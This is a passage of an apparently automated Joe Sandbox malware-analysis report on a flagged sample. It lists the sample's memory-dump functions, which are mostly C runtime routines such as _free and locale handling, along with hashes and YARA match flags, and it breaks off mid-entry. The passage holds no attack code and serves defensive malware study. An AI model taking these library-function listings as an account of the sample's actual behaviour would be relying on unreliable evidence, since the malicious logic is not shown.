                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 745075371-0
                                                                                                                                                                                                                                  • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction ID: 1b3f77dc5bbd182de0f3380a07d744a098785df922b5e67a4064eec65d75b883
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C518F71A00209BBDB20DFA4DC48BBE73B8FF08700F84546AE905EB2D0DB70A9458B71
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00420326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,=CA,?,00420A7B,00000000,?,?,?), ref: 00420398
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                  • String ID: =CA${B
                                                                                                                                                                                                                                  • API String ID: 1084509184-2907596089
                                                                                                                                                                                                                                  • Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                  • Instruction ID: a8185422c35251c6cfc048f10f275341fbfc1625dfe7a1aac3b0cf2615d37100
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D11293A3003055FDB28DF39D8916BABBD1FF84358B54842EEA4687B41D775A843CB44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                  • Opcode ID: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
                                                                                                                                                                                                                                  • Instruction ID: f64e8217d5a59399788f44db3acace11ca7a1a82a17f4f1e7e4f503dd26c9166
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68B1CF71900305AFDB20DFA5C881BEEBBF5BF48304F14416EF959E7242D7B9A8918B64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF21D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                  • Opcode ID: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
                                                                                                                                                                                                                                  • Instruction ID: 0fa511688b48b848b1492c6ab2b95ba10a1dac2812503ef09f824dcb0dceca9a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5B1C071A00205AFDF61DFB8CC84BEEBBF5FF08300F144829EA95A7281DB7599459B60
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041F651 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0041F695
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA01
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA13
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA25
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA37
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA49
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA5B
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA6D
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA7F
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA91
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAA3
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAB5
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAC7
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAD9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F68A
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6AC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6C1
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6CC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6EE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F701
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F70F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F71A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F752
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F759
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F776
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F78E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                  • Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction ID: c0d36dfa6e7f1bd62f92c80ef49453a98ce7ec3addb1216f5c788df5de5df6c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68314A316007049FEB20AA3AE845BD773E8FB44318F15446FE859D72A1DB38FCC68A18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CFF8B8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 05CFF8FC
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFEC68
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFEC7A
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFEC8C
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFEC9E
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFECB0
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFECC2
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFECD4
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFECE6
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFECF8
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFED0A
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFED1C
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFED2E
                                                                                                                                                                                                                                    • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFED40
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF8F1
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: HeapFree.KERNEL32(00000000,00000000,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?), ref: 05CF6517
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: GetLastError.KERNEL32(?,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?,?), ref: 05CF6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF913
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF928
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF933
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF955
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF968
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF976
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF981
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF9B9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF9C0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF9DD
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF9F5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                  • Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction ID: d4068977cb5253b4f2629476f9d6354059efdd048af8dbcf172f3225aa91e7c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE316031604206BFDFB1AA78D848B6A73E9FF00214F144C1EE69AE7150EF72EB819751
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EAE2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
                                                                                                                                                                                                                                  • Instruction ID: 07e65b0fe858109c33bb0f60f82280ccd5dee523497fe62cc235ec4013c6f493
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EC15575E40304ABDB20DBA9CC46FDE77F8EB48704F14416AFE05EB282D674AD818798
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00423356 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                                                                                                  • String ID: _CB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                  • API String ID: 3527080286-940912563
                                                                                                                                                                                                                                  • Opcode ID: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                  • Instruction ID: 5368ad48e2641d38b699083c4314cf7ba7867baba3e9f2aa5664b85b9913fc9a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52518970A00229DBCF10DFA9F9481ADBBB0FB09305FE4419BE481A6254CB7D9B65CB1D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C39
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C45
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C50
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C5B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C66
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C71
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C7C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C87
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C92
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416CA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction ID: 425b14d8582b8484cae793816d5f4fa8e3af98928aded5048720e3a5ca7bcabf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B311E976100218BFDF01FF95D952DD93B65EF48358B4280AAFD088F222DA35EE919B84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF6E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF6EA0
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: HeapFree.KERNEL32(00000000,00000000,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?), ref: 05CF6517
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: GetLastError.KERNEL32(?,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?,?), ref: 05CF6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF6EAC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF6EB7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF6EC2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF6ECD
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF6ED8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF6EE3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF6EEE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF6EF9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF6F07
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction ID: 60c2fdc778206387c503a8e0db9f3ff61ace97c6b1d5a66c2784078e508853cb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3811F576200009BFCF91EF94C844CDD3BA5EF04354B0188A1FA4A9F235DA32EE90EB81
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                                                                                                    • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                                                                                                    • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 835844855-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
                                                                                                                                                                                                                                  • Instruction ID: 963657a0c5d8f337c123b09bbff0c4169cb5784efefba0bb6704a6d5c2622931
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E319F31905B40DEC7319F6AD941A5BFBF0BF48714B508A7FE04AA3AA1C738A504CB5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CE3651 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05CE3656
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 05CE3665
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 05CE367C
                                                                                                                                                                                                                                    • Part of subcall function 05CE157F: std::_Lockit::_Lockit.LIBCPMT ref: 05CE1590
                                                                                                                                                                                                                                    • Part of subcall function 05CE157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05CE15AA
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 05CE3685
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 05CE36B6
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 05CE36CC
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05CE36F2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID: {wB
                                                                                                                                                                                                                                  • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                  • Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction ID: 08596b53ea950cf52f1155125d71a625f8c06ddec50b968c38605eb044d40afb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E11A372A002649BCB15EBA4CC48AEE7BB9FF85720F140D1AE416B7290DB74AA04D794
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF9514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
